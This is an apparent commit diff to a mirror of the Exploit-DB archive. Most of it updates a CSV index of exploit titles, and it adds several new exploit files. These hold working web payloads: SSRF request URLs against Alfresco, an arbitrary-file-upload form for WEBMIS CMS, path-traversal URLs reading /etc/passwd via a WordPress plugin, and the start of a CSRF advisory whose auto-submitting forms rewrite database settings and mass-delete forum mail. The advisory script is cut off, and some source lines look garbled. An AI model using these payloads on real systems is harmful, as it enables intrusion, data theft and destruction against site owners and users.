bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-01-19

Browse source 
10 new exploits
This commit is contained in:
Offensive Security 2016-01-19 05:03:22 +00:00
parent 7f341adc84
commit 93d901f3b2
14 changed files with 709 additions and 43 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

46
files.csv
View file

@ -41,7 +41,7 @@ id,file,description,date,author,platform,type,port
40,platforms/linux/local/40.pl,"Mandrake Linux 8.2 - /usr/mail Local Exploit",2003-06-10,N/A,linux,local,0
41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution Exploit",2003-06-10,pokleyzz,linux,remote,80
42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String Exploit",2003-06-11,ThreaT,windows,remote,25
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
43,platforms/linux/remote/43.pl,"ProFTPD 1.2.9RC1 - (mod_sql) Remote SQL Injection Exploit",2003-06-19,Spaine,linux,remote,21
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection password disclosure Exploit",2003-06-20,"Rick Patel",php,webapps,0
45,platforms/windows/remote/45.c,"Yahoo Messenger 5.5 - Remote Exploit (DSR-ducky.c)",2003-06-23,Rave,windows,remote,80
46,platforms/linux/remote/46.c,"Kerio MailServer 5.6.3 - Remote Buffer Overflow Exploit",2003-06-27,B-r00t,linux,remote,25
@ -104,7 +104,7 @@ id,file,description,date,author,platform,type,port
104,platforms/linux/local/104.c,"hztty 2.0 - Local Root Exploit (Red Hat 9.0)",2003-09-21,c0wboy,linux,local,0
105,platforms/bsd/remote/105.pl,"GNU Cfengine 2.-2.0.3 - Remote Stack Overflow Exploit",2003-09-27,kokanin,bsd,remote,5308
106,platforms/linux/local/106.c,"IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit",2003-09-27,"Juan Escriba",linux,local,0
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
107,platforms/linux/remote/107.c,"ProFTPD 1.2.9rc2 - ASCII File Remote Root Exploit",2003-10-04,bkbll,linux,remote,21
109,platforms/windows/remote/109.c,"Microsoft Windows - (RPC2) Universal Exploit & DoS (RPC3) (MS03-039)",2003-10-09,N/A,windows,remote,135
110,platforms/linux/remote/110.c,"ProFTPD 1.2.7 - 1.2.9rc2 - Remote Root & brute-force Exploit",2003-10-13,Haggis,linux,remote,21
111,platforms/windows/dos/111.c,"Microsoft Windows Messenger Service Denial of Service Exploit (MS03-043)",2003-10-18,LSD-PLaNET,windows,dos,0
@ -367,7 +367,7 @@ id,file,description,date,author,platform,type,port
391,platforms/osx/remote/391.pl,"Mac OS X <= 10.3.3 AppleFileServer Remote Root Overflow Exploit",2004-08-13,"Dino Dai Zovi",osx,remote,548
392,platforms/linux/remote/392.c,"Remote CVS <= 1.11.15 (error_prog_name) Remote Exploit",2004-08-13,"Gyan Chawdhary",linux,remote,2401
393,platforms/linux/local/393.c,"LibPNG <= 1.2.5 png_jmpbuf() Local Buffer Overflow Exploit",2004-08-13,N/A,linux,local,0
394,platforms/linux/local/394.c,"ProFTPd Local pr_ctrls_connect Vulnerability - ftpdctl",2004-08-13,pi3,linux,local,0
394,platforms/linux/local/394.c,"ProFTPd - Local pr_ctrls_connect Vulnerability (ftpdctl)",2004-08-13,pi3,linux,local,0
395,platforms/windows/local/395.c,"AOL Instant Messenger AIM _Away_ Message Local Exploit",2004-08-14,mandragore,windows,local,0
396,platforms/bsd/local/396.c,"OpenBSD ftp Exploit (teso)",2002-01-01,Teso,bsd,local,0
397,platforms/linux/remote/397.c,"WU-IMAP 2000.287(1-2) Remote Exploit",2002-06-25,Teso,linux,remote,143
@ -2533,7 +2533,7 @@ id,file,description,date,author,platform,type,port
2853,platforms/asp/webapps/2853.txt,"SimpleBlog <= 2.3 (admin/edit.asp) Remote SQL Injection Vulnerability",2006-11-26,bolivar,asp,webapps,0
2854,platforms/windows/dos/2854.py,"AT-TFTP <= 1.9 - (Long Filename) Remote Buffer Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2855,platforms/windows/dos/2855.py,"3Com TFTP Service <= 2.0.1 - (Long Transporting Mode) Overflow PoC",2006-11-27,"Liu Qixu",windows,dos,0
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)",2006-11-27,"Evgeny Legerov",linux,remote,21
2856,platforms/linux/remote/2856.pm,"ProFTPD 1.3.0 - (sreplace) Remote Stack Overflow Exploit (Metasploit)",2006-11-27,"Evgeny Legerov",linux,remote,21
2857,platforms/multiple/dos/2857.php,"PHP <= 4.4.4/5.1.6 htmlentities() Local Buffer Overflow PoC",2006-11-27,"Nick Kezhaya",multiple,dos,0
2858,platforms/linux/remote/2858.c,"Evince Document Viewer (DocumentMedia) Buffer Overflow Exploit",2006-11-28,K-sPecial,linux,remote,0
2859,platforms/php/webapps/2859.php,"Discuz! 4.x SQL Injection / Admin Credentials Disclosure Exploit",2006-11-28,rgod,php,webapps,0
@ -2602,7 +2602,7 @@ id,file,description,date,author,platform,type,port
2925,platforms/php/webapps/2925.pl,"mxBB Module newssuite 1.03 - Remote File Inclusion Exploit",2006-12-12,3l3ctric-Cracker,php,webapps,0
2926,platforms/windows/dos/2926.py,"Crob FTP Server 3.6.1 build 263 (LIST/NLST) Denial of Service Exploit",2006-12-13,shinnai,windows,dos,0
2927,platforms/php/webapps/2927.txt,"PhpMyCMS <= 0.3 (basic.inc.php) Remote File Include Vulnerability",2006-12-13,v1per-haCker,php,webapps,0
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
2928,platforms/linux/dos/2928.py,"ProFTPD <= 1.3.0a - (mod_ctrls support) Local Buffer Overflow PoC",2006-12-13,"Core Security",linux,dos,0
2929,platforms/windows/dos/2929.cpp,"Microsoft Internet Explorer 7 (DLL-load hijacking) Code Execution Exploit PoC",2006-12-14,"Aviv Raff",windows,dos,0
2930,platforms/php/webapps/2930.pl,"yaplap <= 0.6.1b (ldap.php) Remote File Include Exploit",2006-12-14,DeltahackingTEAM,php,webapps,0
2931,platforms/php/webapps/2931.txt,"AR Memberscript (usercp_menu.php) Remote File Include Vulnerability",2006-12-14,ex0,php,webapps,0
@ -2997,7 +2997,7 @@ id,file,description,date,author,platform,type,port
3327,platforms/php/webapps/3327.txt,"XLAtunes 0.1 (album) Remote SQL Injection Vulnerability",2007-02-17,Bl0od3r,php,webapps,0
3328,platforms/php/webapps/3328.htm,"S-Gastebuch <= 1.5.3 (gb_pfad) Remote File Include Exploit",2007-02-18,ajann,php,webapps,0
3329,platforms/linux/remote/3329.c,"Axigen eMail Server 2.0.0b2 (pop3) Remote Format String Exploit",2007-02-18,fuGich,linux,remote,110
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit",2007-02-18,Revenge,linux,local,0
3330,platforms/linux/local/3330.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (1)",2007-02-18,Revenge,linux,local,0
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 (CWD) Remote Buffer Overflow Exploit PoC",2007-02-18,r0ut3r,windows,dos,0
3332,platforms/php/webapps/3332.pl,"Xpression News 1.0.1 (archives.php) Remote File Disclosure Exploit",2007-02-18,r0ut3r,php,webapps,0
3333,platforms/linux/local/3333.pl,"ProFTPD 1.3.0/1.3.0a - (mod_ctrls support) Local Buffer Overflow Exploit (2)",2007-02-19,Revenge,linux,local,0
@ -3957,7 +3957,7 @@ id,file,description,date,author,platform,type,port
4309,platforms/php/webapps/4309.txt,"Joomla Component EventList <= 0.8 (did) SQL Injection Vulnerability",2007-08-23,ajann,php,webapps,0
4310,platforms/php/webapps/4310.txt,"Joomla Component BibTeX <= 1.3 - Remote Blind SQL Injection Exploit",2007-08-23,ajann,php,webapps,0
4311,platforms/windows/local/4311.php,"PHP FFI Extension 5.0.5 - Local Safe_mode Bypass Exploit",2007-08-23,NetJackal,windows,local,0
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
4312,platforms/linux/remote/4312.c,"ProFTPD 1.x (module mod_tls) - Remote Buffer Overflow Exploit",2007-08-24,netris,linux,remote,21
4313,platforms/php/webapps/4313.pl,"SunShop 4.0 RC 6 (search) Remote Blind SQL Injection Exploit",2007-08-25,k1tk4t,php,webapps,0
4314,platforms/windows/local/4314.php,"PHP Perl Extension Safe_mode BypassExploit",2007-08-25,NetJackal,windows,local,0
4315,platforms/linux/remote/4315.py,"SIDVault LDAP Server Preauth Remote Buffer Overflow Exploit",2007-08-25,"Joxean Koret",linux,remote,389
@ -7565,7 +7565,7 @@ id,file,description,date,author,platform,type,port
8034,platforms/php/webapps/8034.txt,"Mynews 0_10 (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
8035,platforms/php/webapps/8035.txt,"BlueBird Pre-Release (Auth Bypass) SQL Injection Vulnerability",2009-02-10,x0r,php,webapps,0
8036,platforms/php/webapps/8036.pl,"Fluorine CMS 0.1 rc 1 FD / SQL Injection Command Execution Exploit",2009-02-10,Osirys,php,webapps,0
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
8037,platforms/multiple/remote/8037.txt,"ProFTPd with mod_mysql - Authentication Bypass Vulnerability",2009-02-10,gat3way,multiple,remote,0
8038,platforms/php/webapps/8038.py,"TYPO3 < 4.0.12/4.1.10/4.2.6 (jumpUrl) Remote File Disclosure Exploit",2009-02-10,Lolek,php,webapps,0
8039,platforms/php/webapps/8039.txt,"SkaDate Online 7 - Remote Shell Upload Vulnerability",2009-02-11,ZoRLu,php,webapps,0
8040,platforms/php/webapps/8040.txt,"Graugon Gallery 1.0 (XSS/SQL/Cookie Bypass) Remote Vulnerabilities",2009-02-11,x0r,php,webapps,0
@ -9414,7 +9414,7 @@ id,file,description,date,author,platform,type,port
10039,platforms/windows/local/10039.txt,"GPG4Win GNU - Privacy Assistant PoC",2009-10-23,Dr_IDE,windows,local,0
10042,platforms/php/webapps/10042.txt,"Achievo <= 1.3.4 - SQL Injection",2009-10-14,"Ryan Dewhurst",php,webapps,0
10043,platforms/php/webapps/10043.txt,"redcat media SQL Injection",2009-10-02,s4va,php,webapps,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)",2009-10-12,"Michael Domberg",unix,local,0
10044,platforms/unix/local/10044.pl,"ProFTPd 1.3.0 - mod_ctrls Local Stack Overflow (OpenSUSE)",2009-10-12,"Michael Domberg",unix,local,0
10045,platforms/php/webapps/10045.txt,"Community Translate File Inclusion Vulnerability",2009-10-12,NoGe,php,webapps,0
10046,platforms/php/webapps/10046.txt,"Dazzle Blast Remote File Inclusion",2009-10-12,NoGe,php,webapps,0
10047,platforms/windows/remote/10047.txt,"Femitter HTTP Server 1.03 - Remote Source Disclosure",2009-10-12,Dr_IDE,windows,remote,80
@ -13439,7 +13439,7 @@ id,file,description,date,author,platform,type,port
15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal Vulnerability",2010-11-06,chr1x,windows,remote,0
15447,platforms/php/webapps/15447.txt,"phpCow 2.1 - File Inclusion Vulnerability",2010-11-06,ViRuS_HiMa,php,webapps,0
15448,platforms/asp/webapps/15448.txt,"pilot cart 7.3 - Multiple Vulnerabilities",2010-11-07,Ariko-Security,asp,webapps,0
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15449,platforms/linux/remote/15449.pl,"ProFTPD IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
15451,platforms/php/webapps/15451.pl,"DeluxeBB <= 1.3 - Private Info Disclosure",2010-11-07,"Vis Intelligendi",php,webapps,0
15452,platforms/php/webapps/15452.txt,"Punbb 1.3.4 - Multiple Full Path Disclosure Vulnerability",2010-11-07,SYSTEM_OVERIDE,php,webapps,0
@ -13960,7 +13960,7 @@ id,file,description,date,author,platform,type,port
16221,platforms/php/webapps/16221.txt,"Comment Rating 2.9.23 Wordpress Plugin - Multiple Vulnerabilities",2011-02-23,"High-Tech Bridge SA",php,webapps,0
16127,platforms/php/webapps/16127.txt,"T-Content Managment System Multiple Vulnerabilities",2011-02-07,"Daniel Godoy",php,webapps,0
16128,platforms/php/webapps/16128.txt,"jakcms 2.0 pro rc5 - Stored XSS via useragent http header injection",2011-02-07,"Saif El-Sherei",php,webapps,0
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
16129,platforms/linux/dos/16129.txt,"ProFTPD mod_sftp - Integer Overflow DoS PoC",2011-02-07,kingcope,linux,dos,0
16130,platforms/php/webapps/16130.txt,"MyMarket 1.71 (index.php) SQL Injection Vulnerability",2011-02-07,ahmadso,php,webapps,0
16131,platforms/php/webapps/16131.txt,"SWFUpload 2.5.0 Beta 3 - File Arbitrary Upload",2011-02-07,"Daniel Godoy",php,webapps,0
16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow Exploit",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
@ -14653,7 +14653,7 @@ id,file,description,date,author,platform,type,port
16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0
16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0
16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b - Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
16852,platforms/linux/remote/16852.rb,"ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0
16853,platforms/linux/remote/16853.rb,"Berlios GPSD Format String Vulnerability",2010-04-30,metasploit,linux,remote,0
16854,platforms/hardware/remote/16854.rb,"Linksys WRT54 Access Point apply.cgi Buffer Overflow",2010-09-24,metasploit,hardware,remote,0
@ -14720,7 +14720,7 @@ id,file,description,date,author,platform,type,port
16918,platforms/freebsd/remote/16918.rb,"Zabbix Agent net.tcp.listen Command Injection",2010-07-03,metasploit,freebsd,remote,0
16919,platforms/linux/remote/16919.rb,"DistCC Daemon Command Execution",2010-07-03,metasploit,linux,remote,0
16920,platforms/linux/remote/16920.rb,"SpamAssassin spamd Remote Command Execution",2010-04-30,metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
16921,platforms/linux/remote/16921.rb,"ProFTPD-1.3.3c - Backdoor Command Execution",2010-12-03,metasploit,linux,remote,0
16922,platforms/linux/remote/16922.rb,"UnrealIRCD 3.2.8.1 - Backdoor Command Execution",2010-12-05,metasploit,linux,remote,0
16923,platforms/hardware/webapps/16923.rb,"ContentKeeper Web Remote Command Execution",2010-10-09,metasploit,hardware,webapps,0
16924,platforms/linux/remote/16924.rb,"ClamAV Milter Blackhole-Mode Remote Code Execution",2010-10-09,metasploit,linux,remote,0
@ -15155,7 +15155,7 @@ id,file,description,date,author,platform,type,port
17434,platforms/windows/remote/17434.rb,"RealWin SCADA Server DATAC Login Buffer Overflow",2011-06-22,metasploit,windows,remote,0
17435,platforms/php/webapps/17435.txt,"brewblogger 2.3.2 - Multiple Vulnerabilities",2011-06-23,"Brendan Coles",php,webapps,0
17436,platforms/php/webapps/17436.txt,"iSupport 1.8 - SQL Injection Vulnerability",2011-06-23,"Brendan Coles",php,webapps,0
17437,platforms/jsp/webapps/17437.txt,"manageengine service desk plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
17437,platforms/jsp/webapps/17437.txt,"ManageEngine ServiceDesk Plus 8.0 - Directory Traversal Vulnerability",2011-06-23,"Keith Lee",jsp,webapps,0
17438,platforms/windows/remote/17438.txt,"IBM Web Application Firewall Bypass",2011-06-23,"Trustwave's SpiderLabs",windows,remote,0
17439,platforms/sh4/shellcode/17439.c,"SuperH (sh4) Add root user with password",2011-06-23,"Jonathan Salwan",sh4,shellcode,0
17441,platforms/windows/local/17441.py,"FreeAmp 2.0.7 - (.fat) Buffer Overflow Exploit",2011-06-23,"Iván García Ferreira",windows,local,0
@ -16869,7 +16869,7 @@ id,file,description,date,author,platform,type,port
19500,platforms/linux/local/19500.c,"SCO Open Server 5.0.5 X Library Buffer Overflow Vulnerability (2)",1999-06-21,"The Dark Raver of CPNE",linux,local,0
19501,platforms/linux/local/19501.c,"DIGITAL UNIX 4.0 d/f_AIX <= 4.3.2_CDE <= 2.1_IRIX <= 6.5.14_Solaris <= 7.0_SunOS <= 4.1.4 BoF",1999-09-13,"Job de Haas of ITSX",linux,local,0
19502,platforms/windows/local/19502.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4/SP5 - RASMAN Privilege Escalation Vulnerability",1999-09-17,"Alberto Rodríguez Aragonés",windows,local,0
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
19503,platforms/linux/remote/19503.txt,"ProFTPD 1.2 pre6 - snprintf Vulnerability",1999-09-17,"Tymm Twillman",linux,remote,0
19504,platforms/freebsd/local/19504.c,"Martin Schulze Cfingerd 1.4.2 GECOS Buffer Overflow Vulnerability",1999-09-21,"babcia padlina ltd",freebsd,local,0
19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service Vulnerability",1999-09-22,"Charles M. Hannum",freebsd,dos,0
19506,platforms/windows/local/19506.txt,"MDAC 2.1.2.4202.3_ms Win NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix Registry Key Vulnerabilities",1999-09-21,.rain.forest.puppy,windows,local,0
@ -17858,7 +17858,7 @@ id,file,description,date,author,platform,type,port
20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 - SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 - Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0
@ -19339,7 +19339,7 @@ id,file,description,date,author,platform,type,port
22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0
22077,platforms/php/webapps/22077.txt,"vBulletin 2.2.7/2.2.8 HTML Injection Vulnerability",2002-11-09,"Dorin Balanica",php,webapps,0
22078,platforms/windows/remote/22078.txt,"mollensoft software enceladus server suite 2.6.1/3.9 - Directory Traversal",2002-11-09,luca.ercoli@inwind.it,windows,remote,0
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22079,platforms/linux/dos/22079.sh,"ProFTPD 1.2.x - STAT Command Denial of Service Vulnerability",2002-12-09,"Rob klein Gunnewiek",linux,dos,0
22080,platforms/php/webapps/22080.txt,"Xoops 1.3.5 - Private Message System Font Attributes HTML Injection",2002-11-09,"fred magistrat",php,webapps,0
22081,platforms/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",windows,dos,0
22082,platforms/windows/remote/22082.pl,"Trend Micro PC-cillin 2000/2002/2003 Mail Scanner Buffer Overflow Vulnerability",2002-12-10,"Joel Soderberg",windows,remote,0
@ -20397,7 +20397,7 @@ id,file,description,date,author,platform,type,port
23167,platforms/irix/dos/23167.c,"Sendmail 8.9.2 Headers Prescan Denial of Service Vulnerability",1998-12-12,marchew,irix,dos,0
23168,platforms/linux/local/23168.pl,"Man Utility 2.3.19 - Local Compression Program Privilege Elevation Vulnerability",2003-09-22,"Sebastian Krahmer",linux,local,0
23169,platforms/windows/dos/23169.pl,"wzdftpd 0.1 rc5 Login Remote Denial of Service Vulnerability",2003-09-23,"Moran Zavdi",windows,dos,0
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
23170,platforms/linux/dos/23170.c,"ProFTPD 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun Vulnerability",2003-09-23,netris,linux,dos,0
23171,platforms/linux/remote/23171.c,"MPG123 0.59 - Remote File Play Heap Corruption Vulnerability",2003-09-23,V9,linux,remote,0
23172,platforms/linux/dos/23172.txt,"Gauntlet Firewall for Unix 6.0 SQL-GW Connection Denial of Service Vulnerability",2003-09-24,"Oliver Heinz and Thomas Neuderth",linux,dos,0
23173,platforms/multiple/remote/23173.txt,"TCLhttpd 3.4.2 - Directory Listing Disclosure Vulnerability",2003-09-24,"Phuong Nguyen",multiple,remote,0
@ -35500,3 +35500,13 @@ id,file,description,date,author,platform,type,port
39252,platforms/php/webapps/39252.txt,"WordPress WP Rss Poster Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39253,platforms/php/webapps/39253.txt,"WordPress ENL Newsletter Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
39254,platforms/php/webapps/39254.html,"WordPress CopySafe PDF Protection Plugin Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
39255,platforms/php/webapps/39255.html,"WEBMIS CMS Arbitrary File Upload Vulnerability",2014-07-14,"Jagriti Sahu",php,webapps,0
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/treemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for WordPress charts/zoomabletreemap.php fn Parameter Remote Path Traversal File Disclosure",2014-05-28,"Anant Shrivastava",php,webapps,0
39258,platforms/multiple/remote/39258.txt,"Alfresco /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
39259,platforms/multiple/remote/39259.txt,"Alfresco /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443

Can't render this file because it is too large.

9
platforms/multiple/remote/39258.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
Alfresco Community Edition is prone to multiple security vulnerabilities.
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
Alfresco Community Edition 4.2.f and earlier are vulnerable.
http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port

9
platforms/multiple/remote/39259.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/68http://www.example.com/alfresco/proxy?endpoint=http://internal_system:port 663/info
Alfresco Community Edition is prone to multiple security vulnerabilities.
An attacker may leverage these issues to gain sensitive information or bypass certain security restrictions.
Alfresco Community Edition 4.2.f and earlier are vulnerable.
http://www.example.com/alfresco/cmisbrowser?url=http://internal_system:port

16
platforms/php/webapps/39255.html Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/68658/info
WEBMIS CMS is prone to a vulnerability that lets attackers upload arbitrary files.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in arbitrary code execution within the context of the vulnerable application.
<form
action="http://www.example.com/webmis_installation/plugin/uploadify/uploadify.php"
method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" ><br>
<input type=text name="path" value="/webmis_installation/plugin/">
<input type=text name="someKey" value="someValue"]>
<input type="submit" name="submit" value="Submit">
</form>

10
platforms/php/webapps/39256.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/68662/info
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
Tera Charts 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd
http://www.example.com/wordpress_vuln_check/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../../etc/passwd

9
platforms/php/webapps/39257.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/68662/info
Tera Charts plugin for WordPress is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these issues to obtain potentially sensitive information; other attacks are also possible.
Tera Charts 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/wp_test/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd

180
platforms/php/webapps/39261.txt Executable file
View file

@ -0,0 +1,180 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AEF-CSRF.txt
Vendor:
=============================
www.anelectron.com/downloads/
Product:
====================================
Advanced Electron Forum v1.0.9 (AEF)
Exploit patched current version.
Vulnerability Type:
===================
CSRF
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In Admin panel no CSRF protections exist in multiple areas allowing remote
attackers to make HTTP request on behalf of the victim if they
currently have a valid session (logged in) and visit or click an infected
link, resulting in some of the following destructions.
0x01: Change current database settings
0x02: Delete all Inbox / Sent Emails
0x03: Delete all 'shouts'
0x04: Delete all Topics
by the way, edit profile, avatar and more all seem vulnerable as well..
Exploit code(s):
===============
CSRF 0x01:
change mysql db settings
note: however you will need to know or guess the database name.
<form id="DOOM" accept-charset="ISO-8859-1" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=admin&adact=conpan&seadact=mysqlset"
method="post" name="mysqlsetform">
<input type="hidden" name="server" value="hyp3rlinx.altervista.org" />
<input type="hidden" name="user" value="hyp3rlinx" />
<input type="hidden" name="password" value="DESTROYED" />
<input type="hidden" name="database" value="AEF" />
<input type="hidden" name="dbprefix" value="aef_" />
<script>document.getElementById('DOOM').submit()</script>
</form>
CSRF 0x02:
Delete all Inbox / Sent emails...
<iframe name="demonz" style="display:none" name="hidden-form"></iframe>
<form id="DESTRUCT" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=sentitems"
method="post">
<input type="hidden" id="sent" name="list[]" />
<input type="hidden" name="deleteselsent" value="Delete+Selected" />
</form>
<form id="DOOM" target="demonz" action="
http://localhost/AEF(1.0.9)_Install/index.php?act=usercp&ucpact=inbox"
method="post">
<input type="hidden" id="inbox" name="list[]" />
<input type="hidden" name="deleteselinbox" value="Delete+Selected" />
</form>
<script>
//Sent Email IDs seem to be stored using even numbers 2,4,6 etc...
//Inbox Email IDs seem to use odd numbers
var c=-1
var uwillsuffer;
var amttodelete=10000
var inbox=document.getElementById("inbox")
var outbox=document.getElementById("sent")
function RUIN_EVERYTHING(){
c++
//Inbox IDs are even numbered Sent are odd.
